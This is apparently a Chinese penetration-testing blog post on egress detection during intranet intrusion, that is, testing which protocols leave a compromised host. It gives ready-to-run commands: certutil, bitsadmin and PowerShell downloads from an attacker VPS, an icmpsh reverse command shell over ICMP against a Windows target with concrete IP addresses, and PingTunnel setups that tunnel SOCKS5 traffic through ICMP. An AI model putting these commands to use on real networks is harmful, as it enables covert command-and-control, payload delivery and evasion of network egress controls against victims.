内网渗透-出网探测
2024-11-29 14:11:04 # 内网渗透 #内网渗透 #出网探测

分类

ICMP

DNS

HTTP/HTTPS

攻击端的端口请求记录

将所有端口的流量转发到34444端口

1
iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 34444

查看nat表的规则

1
iptables -t nat -nvL

清除nat表的所有规则

1
iptables -t nat -F

备份iptables规则

1
iptables-save > /tmp/firewall.rules

恢复iptables规则

1
iptables-restore < /tmp/firewall.rules

ICMP协议判断

ping

DNS判断

WIN: ping、nslookup

LIN: ping、nslookup、dig

HTTP判断

LIN: curl http://IP

WIN: certutil -urlcache -split -f http://IP/1

​ bitsadmin /transfer test http://IP/1 c:\1

​ powershell iwr -Uri http://IP/1 -OutFile 1 -UseBasicParsing

这里在VPS用python建立一个http服务就行

只有ICMP协议出网

使用ICMP进行命令行控制(ICMPSH)

使用场景:目标机器是WIN系统

1
2
# 工具地址
https://github.com/bdamele/icmpsh.git

VPS操作

1
2
3
4
5
6
7
# 关闭ICMP回复,如果要开启ICMP回复,将此值设置为0
sysctl -w net.ipv4.icmp_echo_ignore_all = 1
# 报错就用这个临时的
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
# 运行,第一个IP是VPSIP,第二个是靶机IP
python2 icmpsh_m.py 116.205.237.158 202.116.31.94
# 需要impacket库,根据提示安装

靶机操作

1
icmpsh.exe -t VPSIP -d 500 -b 30 -s 128

-d 延迟

-b 退出前的最大空格数

-s 最大缓冲区字节大小

使用PingTunnel搭建隧道

pingtunnel将tcp/udp/socks5流量伪造成icmp流量进行转发,只能用于正向代理

1
https://github.com/esrrhs/pingtunnel.git

服务端参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
-key      设置的纯数字密码,默认0, 参数为int类型,范围从0-2147483647,不可夹杂字母特殊符号
             Set password, default 0

   -nolog    不写日志文件,只打印标准输出,默认0
             Do not write log files, only print standard output, default 0 is off

   -noprint  不打印屏幕输出,默认0
             Do not print standard output, default 0 is off

   -loglevel 日志文件等级,默认info
             log level, default is info

   -maxconn  最大连接数,默认0,不受限制
             the max num of connections, default 0 is no limit

   -maxprt   server最大处理线程数,默认100
             max process thread in server, default 100

   -maxprb   server最大处理线程buffer数,默认1000
             max process thread's buffer in server, default 1000

   -conntt   server发起连接到目标地址的超时时间,默认1000ms
             The timeout period for the server to initiate a connection to the destination address. The default is 1000ms.

客户端参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
客户端参数client param:

    -l        本地的地址,发到这个端口的流量将转发到服务器
              Local address, traffic sent to this port will be forwarded to the server

    -s        服务器的地址,流量将通过隧道转发到这个服务器
              The address of the server, the traffic will be forwarded to this server through the tunnel

    -t        远端服务器转发的目的地址,流量将转发到这个地址
              Destination address forwarded by the remote server, traffic will be forwarded to this address

    -timeout  本地记录连接超时的时间,单位是秒,默认60s
              The time when the local record connection timed out, in seconds, 60 seconds by default

    -key      设置的密码,默认0
              Set password, default 0

    -tcp      设置是否转发tcp,默认0
              Set the switch to forward tcp, the default is 0

    -tcp_bs   tcp的发送接收缓冲区大小,默认1MB
              Tcp send and receive buffer size, default 1MB

    -tcp_mw   tcp的最大窗口,默认20000
              The maximum window of tcp, the default is 20000

    -tcp_rst  tcp的超时发送时间,默认400ms
              Tcp timeout resend time, default 400ms

    -tcp_gz   当数据包超过这个大小,tcp将压缩数据,0表示不压缩,默认0
              Tcp will compress data when the packet exceeds this size, 0 means no compression, default 0

    -tcp_stat 打印tcp的监控,默认0
              Print tcp connection statistic, default 0 is off

    -nolog    不写日志文件,只打印标准输出,默认0
              Do not write log files, only print standard output, default 0 is off

    -noprint  不打印屏幕输出,默认0
              Do not print standard output, default 0 is off

    -loglevel 日志文件等级,默认info
              log level, default is info

    -sock5    开启sock5转发,默认0
              Turn on sock5 forwarding, default 0 is off

    -profile  在指定端口开启性能检测,默认0不开启
              Enable performance detection on the specified port. The default 0 is not enabled.

    -s5filter sock5模式设置转发过滤,默认全转发,设置CN代表CN地区的直连不转发
              Set the forwarding filter in the sock5 mode. The default is full forwarding. For example, setting the CN indicates that the Chinese address is not forwarded.

    -s5ftfile sock5模式转发过滤的数据文件,默认读取当前目录的GeoLite2-Country.mmdb
              The data file in sock5 filter mode, the default reading of the current directory GeoLite2-Country.mmdb

正向socks5代理

服务端

1
2
3
4
5
6
# 关闭ICMP回复
sysctl -w net.ipv4.icmp_echo_ignore_all = 1
# 报错就用这个临时的
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
# 监听
./pingtunnel -type server -noprint 1 -nolog 1

客户端

1
pingtunnel.exe -type client -l :1080 -s VPSIP -sock5 1 -noprint 1 -nolog 1

然后将代理设置为Socks5 127.0.0.1:1080

Prev
2024-11-29 14:11:04 # 内网渗透 #内网渗透 #出网探测
Next